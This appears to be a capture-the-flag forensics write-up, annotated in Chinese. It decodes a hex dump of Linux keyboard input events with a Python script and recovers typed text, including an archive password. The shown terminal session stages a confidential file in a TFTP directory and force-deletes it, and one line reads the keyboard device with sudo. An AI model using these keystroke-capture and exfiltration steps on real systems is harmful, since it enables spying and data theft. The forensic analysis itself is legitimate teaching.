00003a730b0000000000000000000000000006a4bf6300000000f0a10d00
00000000040004002a00000006a4bf6300000000f0a10d00000000000100
2a000100000006a4bf6300000000f0a10d00000000000000000000000000
07a4bf6300000000e764020000000000040004002a00000007a4bf630000
0000e76402000000000001002a000200000007a4bf6300000000e7640200
00000000000000000000000007a4bf6300000000b5e80200000000000400
04002a00000007a4bf6300000000b5e802000000000001002a0002000000
07a4bf6300000000b5e8020000000000000000000000000007a4bf630000
0000306d030000000000040004002a00000007a4bf6300000000306d0300
0000000001002a000200000007a4bf6300000000306d0300000000000000
00000000000007a4bf63000000009bef030000000000040004002a000000
07a4bf63000000009bef03000000000001002a000200000007a4bf630000
00009bef030000000000000000000000000007a4bf63000000004e740400
00000000040004002a00000007a4bf63000000004e740400000000000100
2a000200000007a4bf63000000004e740400000000000000000000000000
07a4bf630000000095f9040000000000040004002a00000007a4bf630000
000095f904000000000001002a000200000007a4bf630000000095f90400
00000000000000000000000007a4bf63000000000e7d0500000000000400
04002a00000007a4bf63000000000e7d05000000000001002a0002000000
07a4bf63000000000e7d050000000000000000000000000007a4bf630000
0000e302060000000000040004002a00000007a4bf6300000000e3020600
0000000001002a000200000007a4bf6300000000e3020600000000000000
00000000000007a4bf63000000008a8a060000000000040004002a000000
07a4bf63000000008a8a06000000000001002a000200000007a4bf630000
00008a8a060000000000000000000000000007a4bf6300000000d00d0700
00000000040004002a00000007a4bf6300000000d00d0700000000000100
2a000200000007a4bf6300000000d00d0700000000000000000000000000
07a4bf63000000008d93070000000000040004002a00000007a4bf630000
00008d9307000000000001002a000200000007a4bf63000000008d930700
00000000000000000000000007a4bf630000000005170800000000000400
04002a00000007a4bf6300000000051708000000000001002a0002000000
07a4bf63000000000517080000000000000000000000000007a4bf630000
0000eb9a080000000000040004002a00000007a4bf6300000000eb9a0800
0000000001002a000200000007a4bf6300000000eb9a0800000000000000
00000000000007a4bf63000000001c1d090000000000040004002a000000
07a4bf63000000001c1d09000000000001002a000200000007a4bf630000
00001c1d090000000000000000000000000007a4bf6300000000fba00900
00000000040004002a00000007a4bf6300000000fba00900000000000100
2a000200000007a4bf6300000000fba00900000000000000000000000000
07a4bf63000000001f240a0000000000040004002a00000007a4bf630000
00001f240a000000000001002a000200000007a4bf63000000001f240a00
00000000000000000000000007a4bf630000000006a80a00000000000400
04002a00000007a4bf630000000006a80a000000000001002a0002000000
07a4bf630000000006a80a0000000000000000000000000007a4bf630000
00007de60a0000000000040004002a00000007a4bf63000000007de60a00
0000000001002a000000000007a4bf63000000007de60a00000000000000
00000000000008a4bf63000000006ba30200000000000400040020000000
08a4bf63000000006ba3020000000000010020000100000008a4bf630000
00006ba3020000000000000000000000000008a4bf630000000002d80400
00000000040004002000000008a4bf630000000002d80400000000000100
20000000000008a4bf630000000002d80400000000000000000000000000
08a4bf630000000082480d0000000000040004002a00000008a4bf630000
000082480d000000000001002a000100000008a4bf630000000082480d00
00000000000000000000000009a4bf6300000000c9f30100000000000400
04002a00000009a4bf6300000000c9f301000000000001002a0002000000
09a4bf6300000000c9f3010000000000000000000000000009a4bf630000
0000ea75020000000000040004002a00000009a4bf6300000000ea750200
0000000001002a000200000009a4bf6300000000ea750200000000000000
00000000000009a4bf6300000000229e0200000000000400040002000000
09a4bf6300000000229e020000000000010002000100000009a4bf630000
0000229e020000000000000000000000000009a4bf6300000000bde00400
00000000040004002a00000009a4bf6300000000bde00400000000000100
2a000000000009a4bf6300000000bde00400000000000000000000000000
09a4bf63000000008179060000000000040004000200000009a4bf630000
00008179060000000000010002000000000009a4bf630000000081790600
0000000000000000000000002da4bf6300000000782b0100000000000400
0400140000002da4bf6300000000782b0100000000000100140001000000
2da4bf6300000000782b01000000000000000000000000002da4bf630000
0000dc1f03000000000004000400140000002da4bf6300000000dc1f0300
0000000001001400000000002da4bf6300000000dc1f0300000000000000
0000000000002da4bf6300000000136f0300000000000400040012000000
2da4bf6300000000136f03000000000001001200010000002da4bf630000
0000136f03000000000000000000000000002da4bf630000000067a80500
0000000004000400130000002da4bf630000000067a80500000000000100
1300010000002da4bf630000000067a80500000000000000000000000000
2da4bf630000000082f706000000000004000400120000002da4bf630000
000082f706000000000001001200000000002da4bf630000000082f70600
0000000000000000000000002da4bf6300000000379e0700000000000400
0400130000002da4bf6300000000379e0700000000000100130000000000
2da4bf6300000000379e07000000000000000000000000002da4bf630000
0000f3c208000000000004000400320000002da4bf6300000000f3c20800
0000000001003200010000002da4bf6300000000f3c20800000000000000
0000000000002da4bf63000000001aad0a00000000000400040032000000
2da4bf63000000001aad0a000000000001003200000000002da4bf630000
00001aad0a000000000000000000000000002da4bf63000000002ab90c00
0000000004000400170000002da4bf63000000002ab90c00000000000100
1700010000002da4bf63000000002ab90c00000000000000000000000000
2da4bf6300000000fbe80d000000000004000400170000002da4bf630000
0000fbe80d000000000001001700000000002da4bf6300000000fbe80d00
0000000000000000000000002da4bf6300000000fb400f00000000000400
0400310000002da4bf6300000000fb400f00000000000100310001000000
2da4bf6300000000fb400f000000000000000000000000002ea4bf630000
0000724c01000000000004000400310000002ea4bf6300000000724c0100
0000000001003100000000002ea4bf6300000000724c0100000000000000
0000000000002ea4bf6300000000a599010000000000040004001e000000
2ea4bf6300000000a59901000000000001001e00010000002ea4bf630000
0000a59901000000000000000000000000002ea4bf6300000000e8f70200
00000000040004001e0000002ea4bf6300000000e8f70200000000000100
1e00000000002ea4bf6300000000e8f70200000000000000000000000000
2ea4bf6300000000024403000000000004000400260000002ea4bf630000
0000024403000000000001002600010000002ea4bf630000000002440300
0000000000000000000000002ea4bf6300000000bd2d0500000000000400
0400260000002ea4bf6300000000bd2d0500000000000100260000000000
2ea4bf6300000000bd2d05000000000000000000000000002ea4bf630000
00006f07070000000000040004001c0000002ea4bf63000000006f070700
0000000001001c00010000002ea4bf63000000006f070700000000000000
0000000000002ea4bf630000000092a3080000000000040004001c000000
2ea4bf630000000092a308000000000001001c00000000002ea4bf630000
000092a308000000000000000000000000002fa4bf63000000003a7a0900
00000000040004002e0000002fa4bf63000000003a7a0900000000000100
2e00010000002fa4bf63000000003a7a0900000000000000000000000000
2fa4bf6300000000bac10a000000000004000400200000002fa4bf630000
0000bac10a000000000001002000010000002fa4bf6300000000bac10a00
0000000000000000000000002fa4bf6300000000c5570c00000000000400
0400390000002fa4bf6300000000c5570c00000000000100390001000000
2fa4bf6300000000c5570c000000000000000000000000002fa4bf630000
00003baa0c0000000000040004002e0000002fa4bf63000000003baa0c00
0000000001002e00000000002fa4bf63000000003baa0c00000000000000
0000000000002fa4bf6300000000b3aa0d00000000000400040020000000
2fa4bf6300000000b3aa0d000000000001002000000000002fa4bf630000
0000b3aa0d000000000000000000000000002fa4bf6300000000bdf30e00
0000000004000400390000002fa4bf6300000000bdf30e00000000000100
3900000000002fa4bf6300000000bdf30e00000000000000000000000000
30a4bf6300000000b9f0070000000000040004002a00000030a4bf630000
0000b9f007000000000001002a000100000030a4bf6300000000b9f00700
00000000000000000000000030a4bf6300000000c3440a00000000000400
04002000000030a4bf6300000000c3440a00000000000100200001000000
30a4bf6300000000c3440a0000000000000000000000000030a4bf630000
000051340b0000000000040004002a00000030a4bf630000000051340b00
0000000001002a000000000030a4bf630000000051340b00000000000000
00000000000030a4bf630000000074320c00000000000400040020000000
30a4bf630000000074320c0000000000010020000000000030a4bf630000
000074320c0000000000000000000000000030a4bf6300000000b5340c00
00000000040004001800000030a4bf6300000000b5340c00000000000100
18000100000030a4bf6300000000b5340c00000000000000000000000000
30a4bf6300000000e4d40d0000000000040004001800000030a4bf630000
0000e4d40d0000000000010018000000000030a4bf6300000000e4d40d00
00000000000000000000000030a4bf6300000000b32b0e00000000000400
04002e00000030a4bf6300000000b32b0e000000000001002e0001000000
30a4bf6300000000b32b0e0000000000000000000000000031a4bf630000
0000e288000000000000040004002e00000031a4bf6300000000e2880000
0000000001002e000000000031a4bf6300000000e2880000000000000000
00000000000031a4bf6300000000c98a0000000000000400040016000000
31a4bf6300000000c98a000000000000010016000100000031a4bf630000
0000c98a000000000000000000000000000031a4bf6300000000ab150200
00000000040004001600000031a4bf6300000000ab150200000000000100
16000000000031a4bf6300000000ab150200000000000000000000000000
31a4bf630000000000b8020000000000040004000f00000031a4bf630000
000000b802000000000001000f000100000031a4bf630000000000b80200
00000000000000000000000031a4bf630000000002f00400000000000400
04000f00000031a4bf630000000002f004000000000001000f0000000000
31a4bf630000000002f0040000000000000000000000000031a4bf630000
000012f3090000000000040004001c00000031a4bf630000000012f30900
0000000001001c000100000031a4bf630000000012f30900000000000000
00000000000031a4bf6300000000a5900b0000000000040004001c000000
31a4bf6300000000a5900b000000000001001c000000000031a4bf630000
0000a5900b0000000000000000000000000032a4bf63000000004e0a0300
00000000040004002600000032a4bf63000000004e0a0300000000000100
26000100000032a4bf63000000004e0a0300000000000000000000000000
32a4bf63000000001c44050000000000040004002600000032a4bf630000
00001c44050000000000010026000000000032a4bf63000000001c440500
00000000000000000000000032a4bf63000000005a950500000000000400
04001f00000032a4bf63000000005a9505000000000001001f0001000000
32a4bf63000000005a95050000000000000000000000000032a4bf630000
000035df060000000000040004001c00000032a4bf630000000035df0600
0000000001001c000100000032a4bf630000000035df0600000000000000
00000000000032a4bf6300000000fc31070000000000040004001f000000
32a4bf6300000000fc3107000000000001001f000000000032a4bf630000
0000fc31070000000000000000000000000032a4bf6300000000da7e0800
00000000040004001c00000032a4bf6300000000da7e0800000000000100
1c000000000032a4bf6300000000da7e0800000000000000000000000000
33a4bf6300000000c414020000000000040004001300000033a4bf630000
0000c414020000000000010013000100000033a4bf6300000000c4140200
00000000000000000000000033a4bf6300000000f8040400000000000400
04001300000033a4bf6300000000f8040400000000000100130000000000
33a4bf6300000000f804040000000000000000000000000033a4bf630000
00009d9d050000000000040004003200000033a4bf63000000009d9d0500
00000000010032000100000033a4bf63000000009d9d0500000000000000
00000000000033a4bf6300000000afee0700000000000400040032000000
33a4bf6300000000afee070000000000010032000000000033a4bf630000
0000afee070000000000000000000000000033a4bf6300000000c41a0900
00000000040004003900000033a4bf6300000000c41a0900000000000100
39000100000033a4bf6300000000c41a0900000000000000000000000000
33a4bf63000000005a0c0b0000000000040004003900000033a4bf630000
00005a0c0b0000000000010039000000000033a4bf63000000005a0c0b00
00000000000000000000000033a4bf6300000000fa890e00000000000400
04000c00000033a4bf6300000000fa890e000000000001000c0001000000
33a4bf6300000000fa890e0000000000000000000000000034a4bf630000
00005498010000000000040004000c00000034a4bf630000000054980100
0000000001000c000000000034a4bf630000000054980100000000000000
00000000000034a4bf63000000007c560200000000000400040013000000
34a4bf63000000007c56020000000000010013000100000034a4bf630000
00007c56020000000000000000000000000034a4bf6300000000c8f90300
00000000040004001300000034a4bf6300000000c8f90300000000000100
13000000000034a4bf6300000000c8f90300000000000000000000000000
34a4bf63000000007dbb050000000000040004002100000034a4bf630000
00007dbb050000000000010021000100000034a4bf63000000007dbb0500
00000000000000000000000034a4bf6300000000f9070700000000000400
04003900000034a4bf6300000000f9070700000000000100390001000000
34a4bf6300000000f907070000000000000000000000000034a4bf630000
000087b3070000000000040004002100000034a4bf630000000087b30700
00000000010021000000000034a4bf630000000087b30700000000000000
00000000000034a4bf630000000021f30800000000000400040039000000
34a4bf630000000021f3080000000000010039000000000034a4bf630000
000021f3080000000000000000000000000035a4bf630000000024800100
00000000040004002a00000035a4bf630000000024800100000000000100
2a000100000035a4bf630000000024800100000000000000000000000000
35a4bf6300000000d918030000000000040004002e00000035a4bf630000
0000d91803000000000001002e000100000035a4bf6300000000d9180300
00000000000000000000000035a4bf630000000048c10300000000000400
04002a00000035a4bf630000000048c103000000000001002a0000000000
35a4bf630000000048c1030000000000000000000000000035a4bf630000
000057bb040000000000040004001800000035a4bf630000000057bb0400
00000000010018000100000035a4bf630000000057bb0400000000000000
00000000000035a4bf6300000000ddaf050000000000040004002e000000
35a4bf6300000000ddaf05000000000001002e000000000035a4bf630000
0000ddaf050000000000000000000000000035a4bf630000000030a70600
00000000040004001800000035a4bf630000000030a70600000000000100
18000000000035a4bf630000000030a70600000000000000000000000000
35a4bf63000000004a55080000000000040004003100000035a4bf630000
00004a55080000000000010031000100000035a4bf63000000004a550800
00000000000000000000000035a4bf6300000000ac4d0a00000000000400
04003100000035a4bf6300000000ac4d0a00000000000100310000000000
35a4bf6300000000ac4d0a0000000000000000000000000035a4bf630000
00002ae10b0000000000040004002100000035a4bf63000000002ae10b00
00000000010021000100000035a4bf63000000002ae10b00000000000000
00000000000035a4bf6300000000dac80d00000000000400040021000000
35a4bf6300000000dac80d0000000000010021000000000035a4bf630000
0000dac80d0000000000000000000000000035a4bf6300000000fac90d00
00000000040004001700000035a4bf6300000000fac90d00000000000100
17000100000035a4bf6300000000fac90d00000000000000000000000000
36a4bf63000000007c1a000000000000040004001700000036a4bf630000
00007c1a000000000000010017000000000036a4bf63000000007c1a0000
00000000000000000000000036a4bf63000000006ef50300000000000400
04002000000036a4bf63000000006ef50300000000000100200001000000
36a4bf63000000006ef5030000000000000000000000000036a4bf630000
00004d43050000000000040004001200000036a4bf63000000004d430500
00000000010012000100000036a4bf63000000004d430500000000000000
00000000000036a4bf63000000009e3f0600000000000400040020000000
36a4bf63000000009e3f060000000000010020000000000036a4bf630000
00009e3f060000000000000000000000000036a4bf630000000092e40600
00000000040004003100000036a4bf630000000092e40600000000000100
31000100000036a4bf630000000092e40600000000000000000000000000
36a4bf6300000000273f070000000000040004001200000036a4bf630000
0000273f070000000000010012000000000036a4bf6300000000273f0700
00000000000000000000000036a4bf630000000085e80800000000000400
04003100000036a4bf630000000085e80800000000000100310000000000
36a4bf630000000085e8080000000000000000000000000036a4bf630000
00005f2c0e0000000000040004001400000036a4bf63000000005f2c0e00
00000000010014000100000036a4bf63000000005f2c0e00000000000000
00000000000037a4bf630000000066d70000000000000400040014000000
37a4bf630000000066d7000000000000010014000000000037a4bf630000
000066d7000000000000000000000000000037a4bf6300000000265a0100
00000000040004001700000037a4bf6300000000265a0100000000000100
17000100000037a4bf6300000000265a0100000000000000000000000000
37a4bf630000000049f4020000000000040004001700000037a4bf630000
000049f4020000000000010017000000000037a4bf630000000049f40200
00000000000000000000000037a4bf630000000056890300000000000400
04001e00000037a4bf6300000000568903000000000001001e0001000000
37a4bf63000000005689030000000000000000000000000037a4bf630000
00001677050000000000040004001e00000037a4bf630000000016770500
0000000001001e000000000037a4bf630000000016770500000000000000
00000000000037a4bf63000000009ce30500000000000400040026000000
37a4bf63000000009ce3050000000000010026000100000037a4bf630000
00009ce3050000000000000000000000000037a4bf6300000000da7f0700
00000000040004002600000037a4bf6300000000da7f0700000000000100
26000000000037a4bf6300000000da7f0700000000000000000000000000
37a4bf6300000000cee6090000000000040004003400000037a4bf630000
0000cee6090000000000010034000100000037a4bf6300000000cee60900
00000000000000000000000037a4bf630000000067800b00000000000400
04003400000037a4bf630000000067800b00000000000100340000000000
37a4bf630000000067800b0000000000000000000000000037a4bf630000
0000a49f0e0000000000040004001900000037a4bf6300000000a49f0e00
00000000010019000100000037a4bf6300000000a49f0e00000000000000
00000000000038a4bf6300000000619a0100000000000400040019000000
38a4bf6300000000619a010000000000010019000000000038a4bf630000
0000619a010000000000000000000000000038a4bf6300000000a23d0200
00000000040004002000000038a4bf6300000000a23d0200000000000100
20000100000038a4bf6300000000a23d0200000000000000000000000000
38a4bf63000000001543040000000000040004002000000038a4bf630000
00001543040000000000010020000000000038a4bf630000000015430400
00000000000000000000000038a4bf630000000079830900000000000400
04002100000038a4bf630000000079830900000000000100210001000000
38a4bf63000000007983090000000000000000000000000038a4bf630000
000088b80b0000000000040004002100000038a4bf630000000088b80b00
00000000010021000000000038a4bf630000000088b80b00000000000000
00000000000039a4bf630000000072a2020000000000040004000f000000
39a4bf630000000072a202000000000001000f000100000039a4bf630000
000072a2020000000000000000000000000039a4bf6300000000da4c0400
00000000040004000f00000039a4bf6300000000da4c0400000000000100
0f000000000039a4bf6300000000da4c0400000000000000000000000000
3aa4bf63000000004dc7030000000000040004001c0000003aa4bf630000
00004dc703000000000001001c00010000003aa4bf63000000004dc70300
0000000000000000000000003aa4bf6300000000eb070600000000000400
04001c0000003aa4bf6300000000eb0706000000000001001c0000000000
3aa4bf6300000000eb0706000000000000000000000000003ea4bf630000
0000851e00000000000004000400120000003ea4bf6300000000851e0000
0000000001001200010000003ea4bf6300000000851e0000000000000000
0000000000003ea4bf630000000091b30100000000000400040012000000
3ea4bf630000000091b301000000000001001200000000003ea4bf630000
000091b301000000000000000000000000003ea4bf6300000000ba980300
00000000040004002d0000003ea4bf6300000000ba980300000000000100
2d00010000003ea4bf6300000000ba980300000000000000000000000000
3ea4bf63000000006a94050000000000040004002d0000003ea4bf630000
00006a9405000000000001002d00000000003ea4bf63000000006a940500
0000000000000000000000003ea4bf6300000000ab600600000000000400
0400170000003ea4bf6300000000ab600600000000000100170001000000
3ea4bf6300000000ab6006000000000000000000000000003ea4bf630000
000047f507000000000004000400170000003ea4bf630000000047f50700
0000000001001700000000003ea4bf630000000047f50700000000000000
0000000000003ea4bf630000000010a70800000000000400040014000000
3ea4bf630000000010a708000000000001001400010000003ea4bf630000
000010a708000000000000000000000000003ea4bf630000000095910a00
0000000004000400140000003ea4bf630000000095910a00000000000100
1400000000003ea4bf630000000095910a00000000000000000000000000
3ea4bf630000000009540c0000000000040004001c0000003ea4bf630000
000009540c000000000001001c00010000003ea4bf630000000009540c00
0000000000000000000000003ea4bf630000000015e60d00000000000400
04001c0000003ea4bf630000000015e60d000000000001001c0000000000
^C
[?2004h]0;[email protected]: ~[email protected]:~$
c
c
d
d
[K
d
d
D
D
o
o
c
c
u
u
ments/
[?2004l
[?2004h]0;[email protected]: ~/[email protected]:~/Documents$
l
l
s
s
[?2004l
[0m[01;31mConfidential.7z[0m
[?2004h]0;[email protected]: ~/[email protected]:~/Documents$
t
t
f
f
t
t
p
p
[?2004l
-bash: tftp: command not found
[?2004h]0;[email protected]: ~/[email protected]:~/Documents$
^M
[K
sudo apt install tftpd-hpa
sudo apt install tftpd-hpa
[?2004l
Reading package lists... 0%
Reading package lists... 100%
Reading package lists... Done
Building dependency tree... 0%
Building dependency tree... 0%
Building dependency tree... 50%
Building dependency tree... 50%
Building dependency tree... Done
Reading state information... 0%
Reading state information... 0%
Reading state information... Done
Suggested packages:
pxelinux
The following NEW packages will be installed:
tftpd-hpa
0 upgraded, 1 newly installed, 0 to remove and 272 not upgraded.
Need to get 49.0 kB of archives.
After this operation, 119 kB of additional disk space will be used.
[33m
0% [Working][0m
Get:1 http://deb.debian.org/debian bullseye/main amd64 tftpd-hpa amd64 5.2+20150808-1.2 [49.0 kB]
[33m
26% [1 tftpd-hpa 16.1 kB/49.0 kB 33%][0m
[33m
100% [Working][0m
Fetched 49.0 kB in 0s (165 kB/s)
Preconfiguring packages ...
7[0;34r8[1A
Selecting previously unselected package tftpd-hpa.
(Reading database ...
(Reading database ... 5%
(Reading database ... 10%
(Reading database ... 15%
(Reading database ... 20%
(Reading database ... 25%
(Reading database ... 30%
(Reading database ... 35%
(Reading database ... 40%
(Reading database ... 45%
(Reading database ... 50%
(Reading database ... 55%
(Reading database ... 60%
(Reading database ... 65%
(Reading database ... 70%
(Reading database ... 75%
(Reading database ... 80%
(Reading database ... 85%
(Reading database ... 90%
(Reading database ... 95%
(Reading database ... 100%
(Reading database ... 140342 files and directories currently installed.)
Preparing to unpack .../tftpd-hpa_5.2+20150808-1.2_amd64.deb ...
7[35;0f[42m[30mProgress: [ 0%][49m[39m [..............................................................................] 8
7[35;0f[42m[30mProgress: [ 20%][49m[39m [###############...............................................................] 8
Unpacking tftpd-hpa (5.2+20150808-1.2) ...
7[35;0f[42m[30mProgress: [ 40%][49m[39m [###############################...............................................] 8
Setting up tftpd-hpa (5.2+20150808-1.2) ...
7[35;0f[42m[30mProgress: [ 60%][49m[39m [##############################################................................] 8
7[35;0f[42m[30mProgress: [ 80%][49m[39m [##############################################################................] 8
Processing triggers for man-db (2.9.4-2) ...
7[0;35r8[1A[J
[?2004h]0;[email protected]: ~/[email protected]:~/Documents$
cat /etc/default/tftpd-hpa
cat /etc/default/tftpd-hpa
[?2004l
# /etc/default/tftpd-hpa
TFTP_USERNAME="tftp"
TFTP_DIRECTORY="/srv/tftp"
TFTP_ADDRESS=":69"
TFTP_OPTIONS="--secure"
[?2004h]0;[email protected]: ~/[email protected]:~/Documents$
sudo mv Confidential.7z /srv/tftp/
sudo mv Confidential.7z /srv/tftp/
[?2004l
[?2004h]0;[email protected]: ~/[email protected]:~/Documents$
l
l
s
s
[?2004l
[?2004h]0;[email protected]: ~/[email protected]:~/Documents$
s
s
u
u
d
d
o
o
r
r
m
m
-
-
r
r
f
f
/
/
s
s
r
r
v/
t
t
f
f
tp/
C
C
o
o
n
n
fidential.7z
[?2004l
[?2004h]0;[email protected]: ~/[email protected]:~/Documents$
Server stream offset: 0xf3d4
Client stream offset: 0x4243
Remaining server data: 0x0
Remaining client data: 0x0
从而得到sudo cat dev/input/event0 | xxd -p
命令的输出,然后就可以用脚本解密
#!/usr/bin/python# script built on https://stackoverflow.com/a/16682549
import struct
import time
import sys
infile_path = "input"
"""
FORMAT represents the format used by linux kernel input event struct
See https://github.com/torvalds/linux/blob/v5.5-rc5/include/uapi/linux/input.h#L28
Stands for: long int, long int, unsigned short, unsigned short, unsigned int
"""
FORMAT = 'llHHI'
EVENT_SIZE = struct.calcsize(FORMAT)
#open file in binary mode
in_file = open(infile_path, "rb")
event = in_file.read(EVENT_SIZE)
keymap = {
0: "KEY_RESERVED",
1: "KEY_ESC",
2: "KEY_1",
3: "KEY_2",
4: "KEY_3",
5: "KEY_4",
6: "KEY_5",
7: "KEY_6",
8: "KEY_7",
9: "KEY_8",
10: "KEY_9",
11: "KEY_0",
12: "KEY_MINUS",
13: "KEY_EQUAL",
14: "KEY_BACKSPACE",
15: "KEY_TAB",
16: "KEY_Q",
17: "KEY_W",
18: "KEY_E",
19: "KEY_R",
20: "KEY_T",
21: "KEY_Y",
22: "KEY_U",
23: "KEY_I",
24: "KEY_O",
25: "KEY_P",
26: "KEY_LEFTBRACE",
27: "KEY_RIGHTBRACE",
28: "KEY_ENTER",
29: "KEY_LEFTCTRL",
30: "KEY_A",
31: "KEY_S",
32: "KEY_D",
33: "KEY_F",
34: "KEY_G",
35: "KEY_H",
36: "KEY_J",
37: "KEY_K",
38: "KEY_L",
39: "KEY_SEMICOLON",
40: "KEY_APOSTROPHE",
41: "KEY_GRAVE",
42: "KEY_LEFTSHIFT",
43: "KEY_BACKSLASH",
44: "KEY_Z",
45: "KEY_X",
46: "KEY_C",
47: "KEY_V",
48: "KEY_B",
49: "KEY_N",
50: "KEY_M",
51: "KEY_COMMA",
52: "KEY_DOT",
53: "KEY_SLASH",
54: "KEY_RIGHTSHIFT",
55: "KEY_KPASTERISK",
56: "KEY_LEFTALT",
57: "KEY_SPACE",
58: "KEY_CAPSLOCK",
59: "KEY_F1",
60: "KEY_F2",
61: "KEY_F3",
62: "KEY_F4",
63: "KEY_F5",
64: "KEY_F6",
65: "KEY_F7",
66: "KEY_F8",
67: "KEY_F9",
68: "KEY_F10",
69: "KEY_NUMLOCK",
70: "KEY_SCROLLLOCK",
71: "KEY_KP7",
72: "KEY_KP8",
73: "KEY_KP9",
74: "KEY_KPMINUS",
75: "KEY_KP4",
76: "KEY_KP5",
77: "KEY_KP6",
78: "KEY_KPPLUS",
79: "KEY_KP1",
80: "KEY_KP2",
81: "KEY_KP3",
82: "KEY_KP0",
83: "KEY_KPDOT",
85: "KEY_ZENKAKUHANKAKU",
86: "KEY_102ND",
87: "KEY_F11",
88: "KEY_F12",
89: "KEY_RO",
90: "KEY_KATAKANA",
91: "KEY_HIRAGANA",
92: "KEY_HENKAN",
93: "KEY_KATAKANAHIRAGANA",
94: "KEY_MUHENKAN",
95: "KEY_KPJPCOMMA",
96: "KEY_KPENTER",
97: "KEY_RIGHTCTRL",
98: "KEY_KPSLASH",
99: "KEY_SYSRQ",
100: "KEY_RIGHTALT",
101: "KEY_LINEFEED",
102: "KEY_HOME",
103: "KEY_UP",
104: "KEY_PAGEUP",
105: "KEY_LEFT",
106: "KEY_RIGHT",
107: "KEY_END",
108: "KEY_DOWN",
109: "KEY_PAGEDOWN",
110: "KEY_INSERT",
111: "KEY_DELETE",
112: "KEY_MACRO",
113: "KEY_MUTE",
114: "KEY_VOLUMEDOWN",
115: "KEY_VOLUMEUP",
116: "KEY_POWER",
117: "KEY_KPEQUAL",
118: "KEY_KPPLUSMINUS",
119: "KEY_PAUSE",
120: "KEY_SCALE",
121: "KEY_KPCOMMA",
122: "KEY_HANGEUL",
122: "KEY_HANGUEL",
123: "KEY_HANJA",
124: "KEY_YEN",
125: "KEY_LEFTMETA",
126: "KEY_RIGHTMETA",
127: "KEY_COMPOSE",
128: "KEY_STOP",
129: "KEY_AGAIN",
130: "KEY_PROPS",
131: "KEY_UNDO",
132: "KEY_FRONT",
133: "KEY_COPY",
134: "KEY_OPEN",
135: "KEY_PASTE",
136: "KEY_FIND",
137: "KEY_CUT",
138: "KEY_HELP",
139: "KEY_MENU",
140: "KEY_CALC",
141: "KEY_SETUP",
142: "KEY_SLEEP",
143: "KEY_WAKEUP",
144: "KEY_FILE",
145: "KEY_SENDFILE",
146: "KEY_DELETEFILE",
147: "KEY_XFER",
148: "KEY_PROG1",
149: "KEY_PROG2",
150: "KEY_WWW",
151: "KEY_MSDOS",
152: "KEY_COFFEE",
152: "KEY_SCREENLOCK",
153: "KEY_ROTATE_DISPLAY",
153: "KEY_DIRECTION",
154: "KEY_CYCLEWINDOWS",
155: "KEY_MAIL",
156: "KEY_BOOKMARKS",
157: "KEY_COMPUTER",
158: "KEY_BACK",
159: "KEY_FORWARD",
160: "KEY_CLOSECD",
161: "KEY_EJECTCD",
162: "KEY_EJECTCLOSECD",
163: "KEY_NEXTSONG",
164: "KEY_PLAYPAUSE",
165: "KEY_PREVIOUSSONG",
166: "KEY_STOPCD",
167: "KEY_RECORD",
168: "KEY_REWIND",
169: "KEY_PHONE",
170: "KEY_ISO",
171: "KEY_CONFIG",
172: "KEY_HOMEPAGE",
173: "KEY_REFRESH",
174: "KEY_EXIT",
175: "KEY_MOVE",
176: "KEY_EDIT",
177: "KEY_SCROLLUP",
178: "KEY_SCROLLDOWN",
179: "KEY_KPLEFTPAREN",
180: "KEY_KPRIGHTPAREN",
181: "KEY_NEW",
182: "KEY_REDO",
183: "KEY_F13",
184: "KEY_F14",
185: "KEY_F15",
186: "KEY_F16",
187: "KEY_F17",
188: "KEY_F18",
189: "KEY_F19",
190: "KEY_F20",
191: "KEY_F21",
192: "KEY_F22",
193: "KEY_F23",
194: "KEY_F24",
200: "KEY_PLAYCD",
201: "KEY_PAUSECD",
202: "KEY_PROG3",
203: "KEY_PROG4",
204: "KEY_DASHBOARD",
205: "KEY_SUSPEND",
206: "KEY_CLOSE",
207: "KEY_PLAY",
208: "KEY_FASTFORWARD",
209: "KEY_BASSBOOST",
210: "KEY_PRINT",
211: "KEY_HP",
212: "KEY_CAMERA",
213: "KEY_SOUND",
214: "KEY_QUESTION",
215: "KEY_EMAIL",
216: "KEY_CHAT",
217: "KEY_SEARCH",
218: "KEY_CONNECT",
219: "KEY_FINANCE",
220: "KEY_SPORT",
221: "KEY_SHOP",
222: "KEY_ALTERASE",
223: "KEY_CANCEL",
224: "KEY_BRIGHTNESSDOWN",
225: "KEY_BRIGHTNESSUP",
226: "KEY_MEDIA",
227: "KEY_SWITCHVIDEOMODE",
228: "KEY_KBDILLUMTOGGLE",
229: "KEY_KBDILLUMDOWN",
230: "KEY_KBDILLUMUP",
231: "KEY_SEND",
232: "KEY_REPLY",
233: "KEY_FORWARDMAIL",
234: "KEY_SAVE",
235: "KEY_DOCUMENTS",
236: "KEY_BATTERY",
237: "KEY_BLUETOOTH",
238: "KEY_WLAN",
239: "KEY_UWB",
240: "KEY_UNKNOWN",
241: "KEY_VIDEO_NEXT",
242: "KEY_VIDEO_PREV",
243: "KEY_BRIGHTNESS_CYCLE",
244: "KEY_BRIGHTNESS_AUTO",
244: "KEY_BRIGHTNESS_ZERO",
245: "KEY_DISPLAY_OFF",
246: "KEY_WWAN",
246: "KEY_WIMAX",
247: "KEY_RFKILL",
248: "KEY_MICMUTE"
}
shift = False
while event:
(tv_sec, tv_usec, type, code, value) = struct.unpack(FORMAT, event)
if type != 0 or code != 0 or value != 0:
# print(f'{tv_sec}.{tv_usec}, {type}, {code}, {value}, {value:08b}')
if type == 0x01: # EV_KEY
key = keymap[code]
if value == 1:
key_label = key[4:]
if len(key_label) == 1:
if shift:
sys.stdout.write(key_label.upper())
else:
sys.stdout.write(key_label.lower())
elif "SHIFT" in key:
print("SHIFT")
elif key_label == "LEFTBRACE":
sys.stdout.write("{")
elif key_label == "RIGHTBRACE":
sys.stdout.write("}")
else:
print(key_label)
else:
if "SHIFT" in key:
print("SHIFT")
event = in_file.read(EVENT_SIZE)
in_file.close()
得到键盘输入
archiveSPACE
managerENTER
SHIFT
cSHIFT
onfidentials3cr3t7azLEFT
BACKSPACE
RIGHT
pSHIFT
2SHIFT
5LEFT
sRIGHT
sLEFT
BACKSPACE
RIGHT
wrLEFT
0RIGHT
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
dSHIFT
SHIFT
SHIFT
1SHIFT
terminalENTER
cdSPACE
SHIFT
dSHIFT
ocuTAB
ENTER
lsENTER
rmSPACE
MINUS
rfSPACE
SHIFT
cSHIFT
onfidentialDOT
pdfTAB
ENTER
exitENTER
这里可以手敲一下还原输入内容
archive manager
